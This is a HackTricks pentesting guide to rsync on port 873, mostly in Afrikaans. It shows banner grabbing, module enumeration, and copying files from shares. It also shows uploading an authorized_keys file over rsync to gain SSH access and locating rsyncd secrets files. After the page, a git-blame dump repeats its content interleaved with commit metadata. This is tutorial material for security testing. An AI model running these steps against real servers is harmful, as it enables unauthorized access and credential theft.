hacktricks/network-services-pentesting/873-pentesting-rsync.md

# 873 - Pentesting Rsync

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## **Basiese Inligting**

From [wikipedia](https://en.wikipedia.org/wiki/Rsync):

> **rsync** is 'n nut om doeltreffend [oor te dra](https://en.wikipedia.org/wiki/File\_transfer) en [te sinkroniseer](https://en.wikipedia.org/wiki/File\_synchronization) [lêers](https://en.wikipedia.org/wiki/Computer\_file) tussen 'n rekenaar en 'n eksterne hardeskyf en oor [netwerk](https://en.wikipedia.org/wiki/Computer\_network) [rekenaars](https://en.wikipedia.org/wiki/Computer) deur die [wysigings tye](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) en groottes van lêers te vergelyk.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Dit word algemeen op [Unix-agtige](https://en.wikipedia.org/wiki/Unix-like) [bedryfstelsels](https://en.wikipedia.org/wiki/Operating\_system) aangetref. Die rsync-algoritme is 'n tipe [delta-kodering](https://en.wikipedia.org/wiki/Delta\_encoding), en word gebruik om netwerkgebruik te minimaliseer. [Zlib](https://en.wikipedia.org/wiki/Zlib) kan gebruik word vir addisionele [data-kompressie](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) en [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) of [stunnel](https://en.wikipedia.org/wiki/Stunnel) kan gebruik word vir sekuriteit.

**Standaard poort:** 873
```
PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack
```
## Opname

### Banier & Handmatige kommunikasie
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```
### **Opname van Gedeelde Mappe**

**Rsync modules** word erken as **gedeelde direkteure** wat moontlik **met wagwoorde beskerm word**. Om beskikbare modules te identifiseer en te kyk of hulle wagwoorde benodig, word die volgende opdragte gebruik:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Wees bewus daarvan dat sommige gedeeltes dalk nie in die lys verskyn nie, wat hulle moontlik verberg. Daarbenewens kan toegang tot sommige gedeeltes beperk wees tot spesifieke **credentials**, aangedui deur 'n **"Access Denied"** boodskap.

### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync)

### Handmatige Rsync Gebruik

Na die verkryging van 'n **module lys**, hang aksies af van of verifikasie nodig is. Sonder verifikasie kan **lys** en **kopieer** van lêers van 'n gedeelde gids na 'n plaaslike gids bereik word deur:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
Hierdie proses **herhalend oordra lêers**, terwyl hulle hul eienskappe en toestemmings behou.

Met **akkrediteeringe** kan lys en aflaai van 'n gedeelde gids soos volg gedoen word, waar 'n wagwoordprompt sal verskyn:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
Om **inhoud op te laai**, soos 'n _**authorized_keys**_ lêer vir toegang, gebruik:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST

Om die rsyncd-konfigurasie-lêer te vind, voer uit:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
Within this file, a _secrets file_ parameter might point to a file containing **gebruikernamme en wagwoorde** for rsyncd authentication.


## References
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`# 873 - Pentesting Rsync`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-03 11:42:55 +01:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Basiese Inligting`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`From [wikipedia](https://en.wikipedia.org/wiki/Rsync):`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			> rsync is 'n nut om doeltreffend [oor te dra](https://en.wikipedia.org/wiki/File\_transfer) en [te sinkroniseer](https://en.wikipedia.org/wiki/File\_synchronization) [lêers](https://en.wikipedia.org/wiki/Computer\_file) tussen 'n rekenaar en 'n eksterne hardeskyf en oor [netwerk](https://en.wikipedia.org/wiki/Computer\_network) [rekenaars](https://en.wikipedia.org/wiki/Computer) deur die [wysigings tye](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) en groottes van lêers te vergelyk.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Dit word algemeen op [Unix-agtige](https://en.wikipedia.org/wiki/Unix-like) [bedryfstelsels](https://en.wikipedia.org/wiki/Operating\_system) aangetref. Die rsync-algoritme is 'n tipe [delta-kodering](https://en.wikipedia.org/wiki/Delta\_encoding), en word gebruik om netwerkgebruik te minimaliseer. [Zlib](https://en.wikipedia.org/wiki/Zlib) kan gebruik word vir addisionele [data-kompressie](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) en [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) of [stunnel](https://en.wikipedia.org/wiki/Stunnel) kan gebruik word vir sekuriteit.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Standaard poort: 873`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE REASON`
			`873/tcp open rsync syn-ack`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Opname`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`### Banier & Handmatige kommunikasie`
GITBOOK-4216: change request with no subject merged in GitBook 2023-12-26 00:45:07 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`nc -vn 127.0.0.1 873`
			`(UNKNOWN) [127.0.0.1] 873 (rsync) open`
			`@RSYNCD: 31.0 <--- You receive this banner with the version from the server`
			`@RSYNCD: 31.0 <--- Then you send the same info`
			`#list <--- Then you ask the sever to list`
			`raidroot <--- The server starts enumerating`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`USBCopy`
			`NAS_Public`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`_NAS_Recycle_TOSRAID <--- Enumeration finished`
			`@RSYNCD: EXIT <--- Sever closes the connection`


			`#Now lets try to enumerate "raidroot"`
			`nc -vn 127.0.0.1 873`
			`(UNKNOWN) [127.0.0.1] 873 (rsync) open`
			`@RSYNCD: 31.0`
			`@RSYNCD: 31.0`
			`raidroot`
			`@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`### Opname van Gedeelde Mappe`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Rsync modules word erken as gedeelde direkteure wat moontlik met wagwoorde beskerm word. Om beskikbare modules te identifiseer en te kyk of hulle wagwoorde benodig, word die volgende opdragte gebruik:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`nmap -sV --script "rsync-list-modules" -p <PORT> <IP>`
			`msf> use auxiliary/scanner/rsync/modules_list`

a 2024-02-08 22:36:35 +01:00			`# Example with IPv6 and alternate port`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Wees bewus daarvan dat sommige gedeeltes dalk nie in die lys verskyn nie, wat hulle moontlik verberg. Daarbenewens kan toegang tot sommige gedeeltes beperk wees tot spesifieke credentials, aangedui deur 'n "Access Denied" boodskap.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
a 2024-02-08 22:36:35 +01:00			`### [Brute Force](../generic-methodologies-and-resources/brute-force.md#rsync)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`### Handmatige Rsync Gebruik`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Na die verkryging van 'n module lys, hang aksies af van of verifikasie nodig is. Sonder verifikasie kan lys en kopieer van lêers van 'n gedeelde gids na 'n plaaslike gids bereik word deur:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
a 2024-02-08 22:36:35 +01:00			`# Listing a shared folder`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`rsync -av --list-only rsync://192.168.0.123/shared_name`

a 2024-02-08 22:36:35 +01:00			`# Copying files from a shared folder`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Hierdie proses herhalend oordra lêers, terwyl hulle hul eienskappe en toestemmings behou.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Met akkrediteeringe kan lys en aflaai van 'n gedeelde gids soos volg gedoen word, waar 'n wagwoordprompt sal verskyn:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`rsync -av --list-only rsync://username@192.168.0.123/shared_name`
			`rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Om inhoud op te laai, soos 'n _authorized_keys_ lêer vir toegang, gebruik:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh`
			```
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`## POST`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Om die rsyncd-konfigurasie-lêer te vind, voer uit:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Within this file, a _secrets file_ parameter might point to a file containing gebruikernamme en wagwoorde for rsyncd authentication.`
a 2024-02-08 22:36:35 +01:00

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`## References`
a 2024-02-08 22:36:35 +01:00			`* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-03 11:42:55 +01:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% endhint %}`